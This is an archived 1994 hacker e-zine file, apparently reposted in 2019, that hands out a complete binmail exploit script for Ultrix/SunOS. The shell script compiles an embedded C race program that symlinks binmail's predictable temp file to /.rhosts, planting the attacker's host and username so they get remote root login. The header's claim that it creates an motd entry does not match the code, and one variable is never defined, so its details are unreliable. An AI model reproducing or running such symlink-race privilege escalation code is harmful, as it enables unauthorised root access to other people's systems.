Mindcrime_file_02

eZine lover (@eZine)

Published in 

Mindcrime

 · 26 Apr 2019

  

=================================[MiNDCRiME]================================== 
[FiLE #2:] 
  
[Here's the latest binmail script. I don't know how many of you have it,  
but here it is. This is courtesy of zomo. ] 
  
From zomo@narqlinq.net23.com Sat Oct  8 10:28:21 1994 
Date: Sat, 8 Oct 1994 10:01:48 -0500 
From: zomo@narqlinq.net23.com 
  
#!/bin/sh  
#  
# This exploits a flaw in Ultrix/SunOS binmail(1), and attempts  
# to embarrass the admin, by creating an motd entry. 
# 
# Written 1994 by Nate Lawson <nlawson@galaxy.calpoly.edu> 
# Minor Revisions by Chris Ellwood <cellwood@gauss.calpoly.edu> 
# Thanks go to 8lgm for the basic script format. 
  
PATH=/usr/ucb:/usr/bin:/bin      export PATH 
IFS=" "                          export IFS 
PROG="`basename $0`" 
ME="`whoami`" 
PWENT="`hostname` `whoami`" 
  
cat > race.c << 'EOF' 
  
#define TARGET "/.rhosts" 
  
#include <stdio.h> 
#include <unistd.h> 
#include <stdlib.h> 
  
int main( ac,av)  int ac; char **av; 
{ 
        unsigned int pid,bpid;  /* Some machines don't have pid_t */ 
        int i; 
        char target[13]; 
        strcpy (target,"/tmp/maa");   
                /* General format for binmail temp names */ 
  
                if ((pid = fork())==0) {  
                   sleep (2); 
                   nice (19);  /* Increase our chances and ... */ 
                   execl ("/bin/mail","mail",0); /* Fork binmail */ 
                } 
  
        bpid=pid;  /* back up our pid for a later time */ 
  
        for (i=11;i>=8;i--) { 
           target[i]=(pid%10) + '0';  
                /* Make the name for the tempfile */ 
                pid /= 10; 
        } 
        while (!symlink(TARGET,target)) unlink (target);  
                /* Point that mktemp()'d file to the pot of gold */ 
        while (symlink(TARGET,target)) unlink (target);  
                /* Probably not necessary, but what the heck */ 
  
        kill(bpid,1);  /* Clean up, don't want to lag the system */      
} 
  
EOF 
  
cc -O -s -o race race.c 
  
# Check we now have race 
if [ ! -x "race" ]; then 
        echo "$PROG: couldnt compile race.c - lame!" 
        exit 1 
fi 
  
OLD_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null 
NEW_TARGET_LEN=$OLD_TARGET_LEN 
  
cp /usr/spool/mail/$ME /tmp/$$          # Backup the mail spool.. we need it 
cp /dev/null /usr/spool/mail/$ME 
echo ""  >> /usr/spool/mail/$ME 
echo $PWENT >> /usr/spool/mail/$ME 
echo ""  >> /usr/spool/mail/$ME 
  
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do 
     ./race & 
     RACE_PID=$! 
     sleep 4 
     NEW_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null 
     kill -9 $RACE_PID 
done 
  
# We won the race 
echo "Succeeded.." 
# Add back our spool.. don't want to lose our mail. 
cp /dev/null /usr/spool/$ME 
cp /tmp/$$ /usr/spool/mail/$ME   
rm -f /tmp/$$ race race.c 
exit 0 
  
=================================[MiNDCRiME]==================================